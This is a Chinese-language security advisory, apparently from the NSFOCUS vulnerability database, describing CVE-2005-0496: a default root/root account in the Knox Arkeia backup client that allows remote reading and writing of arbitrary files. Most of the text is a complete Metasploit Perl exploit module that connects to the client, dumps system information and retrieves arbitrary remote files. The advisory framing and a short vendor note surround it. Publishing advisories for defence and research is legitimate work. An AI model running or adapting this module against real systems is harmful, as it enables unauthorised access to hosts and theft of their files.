安全研究

安全漏洞
Arkeia Client默认root用户口令漏洞

发布日期:2005-02-02
更新日期:2005-02-02

受影响系统:
Knox Software Arkeia Client 5
描述:
CVE(CAN) ID: CVE-2005-0496

Knox Arkeiad是一款Aekeia网络备份客户端程序。

Knox Arkeiad Client的访问控制的实现上存在问题,远程攻击者可以利用这个漏洞读写系统上的任意文件。

Arkeiad Client在安装到系统上时会内置一个用户名和口令都为“root”的帐号,远程攻击者可以用此帐号登录系统,读写任意系统文件。


<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

H D Moore <hdm [at] metasploit.com> 提供了如下的MetaSploit测试模块:


##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::arkeia_agent_access;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use Pex::Arkeia;

my $advanced = { };

my $info =
{
    'Name'     => 'Arkeia Backup Client Remote Access',
    'Version'  => '$Revision: 1.4 $',
    'Authors'  => [ 'H D Moore <hdm [at] metasploit.com>' ],
    'Arch'     => [ ],
    'OS'       => [ ],
    
    'UserOpts' =>
    {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 617],
        
        'RFILE' => [0, 'DATA', 'The remote file path'],
        'LFILE' => [0, 'DATA', 'The local file path'],
        'HNAME' => [0, 'DATA', 'The remote host name'],
    },

    'Description'  => Pex::Text::Freeform(qq{
        This module provides a number of functions for manipulating
        an Arkeia Backup Client installation.
    }),

    'Refs'    =>
    [
        ['OSVDB', 15130],
        ['URL', 'http://metasploit.com/research/arkeia_agent/'],
        ['MIL', '5'],
    ],
    
    'Targets' =>
    [
        ['Read a file from the remote system',        'read'],
        ['Display the remote system information',    'info'],
#        ['Write a file to the remote system',        'write'],        
    ],
    
    'Keys'    => ['arkeia'],

    'DisclosureDate' => 'Feb 20 2005',
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Check {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    
    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
    );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return $self->CheckCode('Connect');
    }
    
    $self->PrintLine("[*] Querying the Arkeia Backup Client...");
    my %info = Pex::Arkeia::ClientInfo($s);
    
    # Give up if we did not get a version response back
    if (! $info{'Version'} ) {
        $self->PrintLine("[*] Error: ". $info{'Error'});
        return $self->CheckCode('Unknown');
    }
    
    # Dump out the information returned by the server
    $self->PrintLine("[*] System Information");
    foreach my $inf (keys %info) {
        next if $inf eq 'Error';
        $self->PrintLine("      $inf: $info{$inf}");
    }

    return $self->CheckCode('Confirmed');
}


sub Exploit {
    my $self = shift;
    my $func = $self->Targets->[$self->GetVar('TARGET')];

    return $self->ARKRead()  if $func->[1] eq 'read';
    return $self->ARKWrite() if $func->[1] eq 'write';
    return $self->ARKInfo()  if $func->[1] eq 'info';
    
    $self->PrintLine("[*] Unknown attack type specified");
    return;
}

sub ARKRead {
    my $self = shift;
    my $path_rem    = $self->GetVar('RFILE');
    my $path_loc    = $self->GetVar('LFILE');
    
    my ($name, $drive, $path);
    my $s = $self->Connect || return;        

    $name = $self->GetEnv('HNAME');

    if (! $name) {
        $self->PrintLine("[*] Warning: The 'HNAME' option should be set to the remote host name");
    }

    # Handle Windows paths
    if ($path_rem =~ m/^([a-z]:)(\\.*)/i) {
        $drive = $1;
        $path  = $2;
        $path  =~ s:\\:/:g;
    }
    # Handle UNIX paths
    else {
        $drive = '/';
        $path  = $path_rem;
    }
    
    my %ret = Pex::Arkeia::GetFile($s, $name, $drive, $path);

    if (! $ret{'Data'}) {
        $self->PrintLine("[*] The file transfer failed due to an error");
        $self->PrintLine("[*] ".$ret{'Info'}) if $ret{'Info'};
        $self->PrintLine("[*] Error: ".$ret{'Error'}) if $ret{'Error'};        
        return;
    }
    
    # Quick and dirty way to pull the file contents out
    my ($fsize) = $ret{'Data'} =~ m/n_fsize\x00(\d+)\x00/ms;
    my $findex  = rindex($ret{'Data'}, "n_cksum\x00");
    my $fdata   = substr($ret{'Data'}, $findex - $fsize, $fsize);
    my $trunc   = $fsize;

    # If the file was truncated, we try to salvage what we can
    if ($findex == -1) {
        $self->PrintLine("[*] Warning: This file is greater than 65k and will be truncated");
        (undef, $trunc, $fdata) = $ret{'Data'} =~ m/n_(size|cmpatrr)\x00[^\x00]+\x00[^\x00]+\x00[^\x00]+\x00(\d{5})(.*)/msg;
        
        # Even more gross hacks
        if (! $trunc) {
            $self->PrintLine("[*] Could not determine the file start, dumping the entire response");
            $fdata = $ret{'Data'};
            $trunc = length($fdata);
        }
    }

    $self->PrintLine("[*] Transferred $trunc of $fsize bytes for $path_rem");

    if ($path_loc) {
        if (! open(TMP, '>'.$path_loc)) {
            $self->PrintLine("[*] Could not open local path $path_loc: $!");
            return;
        }
        print TMP $fdata;
        close(TMP);
        return;
    }
    
    $self->PrintLine("[*] Dumping file contents...");
    $self->PrintLine($fdata);
    return;
}

sub ARKWrite {
    my $self = shift;
    my $path_rem    = $self->GetVar('RFILE');
    my $path_loc    = $self->GetVar('LFILE');

    $self->PrintLine("[*] This feature is still under development");
    return;
        
    my $s = $self->Connect || return;
}

sub ARKInfo {
    my $self = shift;
    my $s = $self->Connect || return;
    
    $self->PrintLine("[*] Querying the Arkeia Backup Client...");
    my %info = Pex::Arkeia::ClientInfo($s);
    
    # Give up if we did not get a version response back
    if (! $info{'Version'} ) {
        $self->PrintLine("[*] Error: ". $info{'Error'});
        return;
    }
    
    # Dump out the information returned by the server
    $self->PrintLine("[*] System Information");
    foreach my $inf (keys %info) {
        next if $inf eq 'Error';
        $self->PrintLine("      $inf: $info{$inf}");
    }
    
    $s->Close;
    return;
}


sub Connect {
    my $self = shift;
    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $self->GetVar('RHOST'),
        'PeerPort'  => $self->GetVar('RPORT'),
    );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }
    
    return $s;
}
1;

建议:
厂商补丁:

Knox Software
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.knox-software.com

浏览次数:2710
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障